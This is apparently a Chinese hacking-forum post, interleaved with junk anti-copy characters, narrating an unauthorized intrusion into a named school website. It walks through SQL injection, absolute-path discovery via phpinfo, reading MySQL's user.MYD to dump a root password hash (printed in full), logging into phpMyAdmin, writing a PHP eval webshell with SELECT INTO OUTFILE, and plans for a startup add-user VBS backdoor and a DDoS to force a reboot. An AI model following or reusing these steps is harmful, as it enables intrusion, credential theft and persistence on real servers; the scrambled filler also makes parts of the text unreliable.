第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏6 m8 M3 p, S6 q* G
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!. k( F4 b5 l% U2 ~5 Q' a7 `- J
* E0 s8 \3 F. P4 E4 X. ?
/ [7 L( W: h9 u8 }; A3 T
# O- q, l' P, e' V7 d- b9 C$ Q常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 ! Y+ b1 D" f9 e6 t* Z+ b$ g/ g1 R
4 x0 [2 Q( D8 L那么想可以直接写入shell ,getshell有几个条件:) {" E& ~+ w+ P8 E. e; b- g
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
0 F; r: L, y' I$ O5 ]' h5 e @% V% t" u3 ~
试着爆绝对路径:
- L5 a4 \& N1 a1 Y. v1 V4 I. H1./phpMyAdmin/index.php?lang[]=1
w$ q- r% g. a T. X$ r2./phpMyAdmin/phpinfo.php
0 n3 V* N5 W9 F- ~3./load_file()
2 `7 w5 J) g7 r D. P, e4./phpmyadmin/themes/darkblue_orange/layout.inc.php
0 t) H0 Q; `2 K( ^/ ~5./phpmyadmin/libraries/select_lang.lib.php
# ^9 p4 P0 j/ c0 u' o+ C" n6./phpmyadmin/libraries/lect_lang.lib.php 1 K8 y2 w1 E, a
7./phpmyadmin/libraries/mcrypt.lib.php
' ]3 b$ S. H, x- _* n3 H8./phpmyadmin/libraries/export/xls.php $ d+ x5 Q1 ?; p! V- z3 L
- ^& d- W, U7 u$ I4 u' k
均不行........................... % g! y$ I* z1 W) R* n+ j
- w0 t. x" J% H+ o" y2 [
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php ; t) k m, @- S& `: X8 t* p
x6 N, J- |# p! ^% K$ a ~
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin # f; N9 J3 }; S; Y( f. |4 _
% j" G4 o) t* U5 z# W: N2 j* |9 e. [& B
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 ( M9 H* q0 ~7 {8 i& g
+ Z; H% ~8 v6 |1 i2 ^4 s" i; _
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... : J3 e9 M) u1 @5 q ^1 V% o
! s, v h" {( m0 e( _( A/ }
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
% n6 i: |0 l: Q# }$ D4 ^4 }- ~! B+ Q! @6 r2 x" x8 D4 E% K F: N
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
8 q- x# ~0 a D% z5 x
* Q* y' D7 ^1 H# V: j# N X2 \自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD ! [( N* {( q/ f4 [9 k& n, I( g. \
* i# F' G3 e* s1 I0 v! [成功读到root密码: + J$ Z* b& c4 Z4 v j7 P
, E3 h' q+ K7 q
17---- r(0072)
- @% _+ C, ^& j' u& |- P/ c) Z4 ^18---- o(006f) 2 \& @) [1 Y) X6 H: V4 o: O8 W% a) o
19---- o(006f)
4 i5 t7 V, b3 b2 z& ` E5 j20---- t(0074) 8 V( Z! r: t7 E4 R( h# W6 y+ }& M3 a
21---- *(002a) . W+ ~5 T8 h: G5 m" C
22---- 8(0038)
9 |8 B. n, q6 X+ F# I2 x23---- 2(0032) 2 P( w f* V" E4 W5 i7 w. f
24---- E(0045)
2 s7 g4 L+ p5 w( @25---- 1(0031) 5 t; P8 f3 @8 n+ [/ ]' n
26---- C(0043)
3 o% A1 q- r h( |) @27---- 5(0035)
( {8 T) A' v8 ?& v, P8 F28---- 8(0038)
/ ?0 K0 Z- i7 c# t2 o29---- 2(0032) : Y# o# l0 _5 Q" B
30---- 8(0038) : P5 E0 R+ ~# I2 L7 G
31---- A(0041) % \4 ~6 z, r7 @( u9 ?
32---- 9(0039) M* Q; e5 x, t1 S* j6 M- r
33---- B(0042) : X6 E7 U3 \3 D
34---- 5(0035)
1 Z8 d8 u, J# g4 {: a1 {35---- 4(0034) 4 |( X) P7 Q6 W9 \* d+ x4 _
36---- 8(0038) 7 E6 f3 y- [8 D# J' b$ B7 |& z @
37---- 6(0036)
) u+ F+ G* Y, ?* x) ~0 W2 u0 ?' J38---- 4(0034)
8 ?1 x0 ~8 }2 h6 b. ~8 g39---- 9(0039)
8 G& z2 S# k' j6 K2 c5 K40---- 1(0031)
) Y% g- d- O. [4 l" V41---- 1(0031) 8 F# x! Y' Y& e! Z) R+ @: [
42---- 5(0035) ! F5 y4 n; F7 U; H' c1 p* ?5 ^2 F
43---- 3(0033)
2 N: W0 r" I5 ~0 [44---- 5(0035)
6 j1 b% P% P7 S45---- 9(0039)
+ G; y/ n8 y% f3 t0 @46---- 8(0038)
? k( U, d6 q8 v47---- F(0046)
, E& ?3 S1 U7 y: ]$ J48---- F(0046)
" N& C( t4 }& Z49---- 4(0034) ! r8 M$ g+ m0 c
50---- F(0046)
5 J$ Q8 [6 `. ^* l6 e9 ]0 f0 i51---- 0(0030) 8 U. _- B& ?6 h+ a
52---- 3(0033)
: K/ z. K2 A# d53---- 2(0032) 3 n0 O5 g9 s3 X3 O' T- C4 A$ ]- q
54---- A(0041)
/ Y3 V2 r' A0 S55---- 4(0034)
! D! K* V& |. E; x56---- A(0041)
+ m2 v: Z; ` ^! `+ L o$ W57---- B(0042) 2 |; E1 q V% N9 O; w' A3 o- L3 w
58---- *(0044)
$ e7 |6 c% I) ?( p' J4 {9 P0 e( U59---- *(0035)
9 g2 U/ e1 u2 n( ?1 `: Z0 M/ B* Q4 V60---- *(0041) # f; i: Y2 i; u: h4 q, c
61---- *0032) ) G$ K4 X* _2 ]& T O1 l. d9 @. M2 a
' o# y7 d% T" B. Z+ b4 c, Y解密后成功登陆phpmyamin
* R/ m1 b' o5 i6 U8 C# O) R
( a1 T y# @; D5 C+ |) ~! j2 q0 W0 L; q: R9 K) ~2 T, e
9 N& a! [ F/ H& [; e( e" r
! Z. V1 ?1 {" l: l找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
0 i+ j+ ]. Q+ r4 o6 y- {
. v3 [+ L) Z) Z, h( N, O! C成功执行,拿下shell,菜刀连接: + F6 K3 o$ {# d" Z6 n; ?
9 ~: o2 k7 g9 t; s; r! e6 C, N8 U2 G
服务器不支持asp,aspx,php提权无果...................
' g2 R& b, V0 D; ~ q$ a4 X- b [/ b" Q. X6 ^' _
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: ]0 Z5 l* X6 I" @$ z2 V, ~
服务器上已经有个隐藏帐号了 9 o+ M* b- M% ?' @ H& x8 y7 o& H
别名 administrators
$ S$ C- j& V' }$ B注释 管理员对计算机/域有不受限制的完全访问权
2 o8 ~0 E- e4 P! e1 p成员 0 o! H' v; N" I( `* m# r( U
-------------------------------------------------------------------------------+ v8 _; S% u! v% [! }1 Q0 V
admin! x- T5 l8 B0 C5 T l1 q
Administrator
8 M" x+ h) [8 g; g$ [0 Islipper$
& u- K- U! `( esqluser
6 o: b& r d9 b4 j: b& Z9 b命令成功完成。
, A c p6 H/ ^' h: w+ D* R! a; z9 [
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
( n' M, N3 d2 x5 ]) q, o9 P, G& s7 S$ T6 S5 p
ddos服务器重启,不然就只能坐等服务器重启了...............................
1 _7 n! d! L; q+ b. Q3 D) U# `2 r [1 ?3 o
2 z) ^; y6 i# b7 _) a& i0 ~! O
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
